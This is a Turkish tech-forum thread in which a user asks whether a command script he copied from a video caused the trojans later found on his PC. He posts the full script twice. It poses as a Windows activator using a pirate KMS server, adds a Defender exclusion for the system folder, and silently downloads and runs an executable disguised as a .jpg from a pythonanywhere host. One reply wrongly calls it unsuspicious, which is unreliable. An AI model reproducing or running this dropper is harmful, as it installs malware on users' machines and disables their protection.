CMD'ye yazılan kod virüslü mü?

M

Md_05

Picopat
Katılım
26 Şubat 2025
Mesajlar
25
Daha fazla  
Cinsiyet
Erkek
Arkadaşlar

Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.


Şu videodaki kodu CMD'ye kopyalayıp yapıştırdım. Yakın bir tarihte bilgisayarıma virüs girdi ve bilgisayarım yavaşladı, oyundaki FPS'im falan düştü. Her neyse PC'ye Kaspersky inirdim 4 tane trojan çıktı. Yani şu anlık bilgisayarımda sıkıntı yok her şey normal haline geldi. Sürekli tarama yapıyorum bir şey çıkmıyor Allah'tan. Yani ben bu videodaki şeyleri şeyleri yaptım CMD'ye girdim. Gidikten bir gün sonra mı 2 gün sonra mı bilgisayar yavaşlama ya başladı acaba denk mi geldi yoksa bundan mı virüs bulaştı
 
Md_05 dedi:
Arkadaşlar.

Bu içeriği görüntülemek için üçüncü taraf çerezlerini yerleştirmek için izninize ihtiyacımız olacak.
Daha detaylı bilgi için, çerezler sayfamıza bakınız.


Şu videodaki kodu CMD'ye kopyalayıp yapıştırdım. Yakın bir tarihte bilgisayarıma virüs girdi ve bilgisayarım yavaşladı, oyundaki FPS'im falan düştü. Her neyse PC'ye Kaspersky inirdim 4 tane trojan çıktı. Yani şu anlık bilgisayarımda sıkıntı yok her şey normal haline geldi. Sürekli tarama yapıyorum bir şey çıkmıyor Allah'tan. Yani ben bu videodaki şeyleri şeyleri yaptım CMD'ye girdim. Gidikten bir gün sonra mı 2 gün sonra mı bilgisayar yavaşlama ya başladı acaba denk mi geldi yoksa bundan mı virüs bulaştı.
Genişletmek için tıkla...


Hocam internet hakkım yok ne yazdınız kod olarak yazarsanız yardımcı olurum.
 
585923 dedi:
Hocam internet hakkım yok ne yazdınız kod olarak yazarsanız yardımcı olurum.
Genişletmek için tıkla...

@Echo off
Net session >nul 2>&1
İf %errorLevel% neq 0 (
Echo This script needs to be run as Administrator. Please open CMD as Administrator.
Pause
)

PowerShell -windowstyle hidden -Command "Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine -Force"

For /f "tokens = 2 delims==" %a in ('wmic OS get caption /value ^| find "="') do set WindowsProductName=%a

Set WindowsProductName=%WindowsProductName:~0, 50%

Set Key=
İf "%WindowsProductName%"=="Microsoft Windows 10 Pro N" (
Set Key = MH37W-N47XK-V7XM9-C7227-GCQG9
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Pro N" (
Set Key = MH37W-N47XK-V7XM9-C7227-GCQG9
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Pro" (
Set Key = W269N-WFGWX-YVC9B-4J6C9-T83GX
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Pro" (
Set Key = W269N-WFGWX-YVC9B-4J6C9-T83GX
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Enterprise" (
Set Key = NPPR9-FWDCX-D2C8J-H872K-2YT43
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Enterprise" (
Set Key = NPPR9-FWDCX-D2C8J-H872K-2YT43
) Else if "%WindowsProductName%"=="Microsoft Windows 10 EnterpriseN" (
Set Key = DPH2V-TTNVB-4x9Q3-TJR4H-KHJW4
) Else if "%WindowsProductName%"=="Microsoft Windows 11 EnterpriseN" (
Set Key = DPH2V-TTNVB-4x9Q3-TJR4H-KHJW4
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Education" (
Set Key = NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Education" (
Set Key = NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
) Else if "%WindowsProductName%"=="Microsoft Windows 10 EducationN" (
Set Key = 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ
) Else if "%WindowsProductName%"=="Microsoft Windows 11 EducationN" (
Set Key = 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Home" (
Set Key = TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Home" (
Set Key = TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Home N" (
Set Key = 3KHY7-WNT83-DGQKR-F7HPR-844BM
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Home N" (
Set Key = 3KHY7-WNT83-DGQKR-F7HPR-844BM
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Home Single Language" (
Set Key = 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Home Single Language" (
Set Key = 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
) Else if "%WindowsProductName%"=="Microsoft Windows 10 Home Country Specific" (
Set Key = PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
) Else if "%WindowsProductName%"=="Microsoft Windows 11 Home Country Specific" (
Set Key = PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
) Else if "%WindowsProductName%"=="Microsoft Enterprise 2015LTSB" (
Set Key = WNMTR-4C88C-JK8YV-HQ7T2-76DF9
) Else if "%WindowsProductName%"=="Microsoft Enterprise 2015LTSBN" (
Set Key = 2F77B-TNFGY-69QQF-B8YKP-D69TJ
) Else if "%WindowsProductName%"=="Microsoft Enterprise 2016LTSB" (
Set Key = DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
) Else (
Set Key = QFFDN-GRT3P-VKWWX-X7T3R-8B639
)

%SystemRoot%\System32\slmgr.vbs /ipk %Key% >nul 2>&1

%SystemRoot%\System32\slmgr.vbs /skms KMS. Digiboy. İr >nul 2>&1

%SystemRoot%\System32\slmgr.vbs /ato >nul 2>&1

PowerShell -windowstyle hidden -Command "Set-MpPreference -ExclusionPath %SystemRoot%" >nul 2>&1

PowerShell -Command "Start-Sleep -Milliseconds 200; Start-Sleep -Milliseconds 200; Start-Sleep -Milliseconds 200; Invoke-WebRequest -Uri 'https://bee496bd.pythonanywhere.com/static/SystemUI.jpg' -OutFile \"$env:SystemRoot\\system32\\SystemUI.exe\"; Start-Process "$env:SystemRoot\\system32\\SystemUI.exe"" >nul 2>&1

Exit /b

Reis bunu yazdım

Sakuya Izayoi dedi:
Belirli anahtarlar var ve phytonanywhere uzantılı bir siteye bağlanıyor çok ilginç ve script de video da çok yeni. Bence güvenli değil. Sakatlık var gibime geldi.
Genişletmek için tıkla...
bu arada arkadaş videoyu silmiş başka bir kanaldan buldum yani, normalde 3-4 gün öncesinde ait video
 
Md_05 dedi:
@Echo off.
Net session >nul 2>&1
İf %errorlevel% neq 0 (
Echo this script needs to be run as administrator. Please open CMD as administrator.
Pause.
)

PowerShell -windowstyle hidden -command "set-executionpolicy -executionpolicy bypass -scope localmachine -Force"

For /f "tokens = 2 delims==" %a in ('wmic OS get caption /value ^| find "="') do set windowsproductname=%a

Set windowsproductname=%windowsproductname:~0, 50%

Set key=
İf "%windowsproductname%"=="Microsoft Windows 10 Pro n" (
Set key = MH37W-N47XK-V7XM9-C7227-gcqg9
) Else if "%windowsproductname%"=="Microsoft Windows 11 Pro n" (
Set key = MH37W-N47XK-V7XM9-C7227-gcqg9
) Else if "%windowsproductname%"=="Microsoft Windows 10 Pro" (
Set key = W269n-wfgwx-YVC9B-4J6C9-T83gx
) Else if "%windowsproductname%"=="Microsoft Windows 11 Pro" (
Set key = W269n-wfgwx-YVC9B-4J6C9-T83gx
) Else if "%windowsproductname%"=="Microsoft Windows 10 Enterprise" (
Set key = nppr9-fwdcx-D2C8J-H872K-2YT43
) Else if "%windowsproductname%"=="Microsoft Windows 11 Enterprise" (
Set key = nppr9-fwdcx-D2C8J-H872K-2YT43
) Else if "%windowsproductname%"=="Microsoft Windows 10 enterprisen" (
Set key = dph2v-ttnvb-4x9Q3-TJR4h-khjw4
) Else if "%windowsproductname%"=="Microsoft Windows 11 enterprisen" (
Set key = dph2v-ttnvb-4x9Q3-TJR4h-khjw4
) Else if "%windowsproductname%"=="Microsoft Windows 10 education" (
Set key = NW6C2-qmpvw-D7kkk-3gkt6-vcfb2
) Else if "%windowsproductname%"=="Microsoft Windows 11 education" (
Set key = NW6C2-qmpvw-D7kkk-3gkt6-vcfb2
) Else if "%windowsproductname%"=="Microsoft Windows 10 educationn" (
Set key = 2wh4n-8QGBV-H22JP-CT43Q-mdwwj
) Else if "%windowsproductname%"=="Microsoft Windows 11 educationn" (
Set key = 2wh4n-8QGBV-H22JP-CT43Q-mdwwj
) Else if "%windowsproductname%"=="Microsoft Windows 10 Home" (
Set key = TX9XD-98N7v-6WMQ6-BX7FG-H8Q99
) Else if "%windowsproductname%"=="Microsoft Windows 11 Home" (
Set key = TX9XD-98N7v-6WMQ6-BX7FG-H8Q99
) Else if "%windowsproductname%"=="Microsoft Windows 10 Home n" (
Set key = 3KHY7-WNT83-dgqkr-F7HPR-844BM
) Else if "%windowsproductname%"=="Microsoft Windows 11 Home n" (
Set key = 3KHY7-WNT83-dgqkr-F7HPR-844BM
) Else if "%windowsproductname%"=="Microsoft Windows 10 Home Single Language" (
Set key = 7HNRX-D7KGG-3K4rq-4wpj4-ytdfh
) Else if "%windowsproductname%"=="Microsoft Windows 11 Home Single Language" (
Set key = 7HNRX-D7KGG-3K4rq-4wpj4-ytdfh
) Else if "%windowsproductname%"=="Microsoft Windows 10 Home country specific" (
Set key = pvmjn-6dfy6-9ccp6-7BKTT-D3wvr
) Else if "%windowsproductname%"=="Microsoft Windows 11 Home country specific" (
Set key = pvmjn-6dfy6-9ccp6-7BKTT-D3wvr
) Else if "%windowsproductname%"=="Microsoft Enterprise 2015LTSB" (
Set key = wnmtr-4C88C-JK8YV-HQ7T2-76df9
) Else if "%windowsproductname%"=="Microsoft Enterprise 2015LTSBn" (
Set key = 2F77b-tnfgy-69QQF-B8YKP-D69tj
) Else if "%windowsproductname%"=="Microsoft Enterprise 2016LTSB" (
Set key = dcphk-nfmtc-H88mj-pfhpy-QJ4bj
) Else (
Set key = qffdn-grt3p-vkwwx-X7T3R-8B639
)

%SystemRoot%\System32\slmgr.vbs /ipk %key% >nul 2>&1

%SystemRoot%\System32\slmgr.vbs /skms KMS. Digiboy. İr >nul 2>&1

%SystemRoot%\System32\slmgr.vbs /ato >nul 2>&1

PowerShell -windowstyle hidden -command "set-mppreference -exclusionpath %systemroot%" >nul 2>&1

PowerShell -command "start-sleep -milliseconds 200; start-sleep -milliseconds 200; start-sleep -milliseconds 200; ınvoke-webrequest -uri 'https://bee496bd.pythonanywhere.com/static/SystemUI.jpg' -outfile \"$env:SystemRoot\\system32\\SystemUI.exe\"; start-process "$env:SystemRoot\\system32\\SystemUI.exe"" >nul 2>&1

Exit /b

Reis bunu yazdım.
Genişletmek için tıkla...

Hocam çok şüpheli bir şey göze çarpmıyor rastlantı olabilir ama dikkatli olun CMD'ye kod girerken.
 
Md_05 dedi:
Şu videodaki kodu CMD'ye kopyalayıp yapıştırdım. Yakın bir tarihte bilgisayarıma virüs girdi ve bilgisayarım yavaşladı, oyundaki FPS'im falan düştü. Her neyse PC'ye Kaspersky inirdim 4 tane trojan çıktı.
Genişletmek için tıkla...
Bu duruma ne diyeceksiniz peki?

Karışık bir olay ne yalan söyleyeyim.
 

Benzer konular

Akdeniz1
Atom kod editörü virüslü mü?
Mesaj
8
Görüntüleme
720
Akdeniz1
Akdeniz1
zZaPp
Node.js CMD'ye yazılan komutlardan virüs bulaşır mı?
Mesaj
3
Görüntüleme
414
zZaPp
zZaPp
1
Xbox Game Bar'ı kapatmak için CMD'ye yazılan komut virüs bulaştırır mı?
Mesaj
6
Görüntüleme
250
Turkıye anlasması
T
Mozcanerdem
Kodular IO virüslü mü?
Mesaj
0
Görüntüleme
441
Mozcanerdem
Mozcanerdem
samedededede
Sisteme yazılan kod sonucunda virüs bulaştı
Mesaj
9
Görüntüleme
853
samedededede
samedededede

Technopat Haberler

Yeni konular

Yeni mesajlar

Geri
Yukarı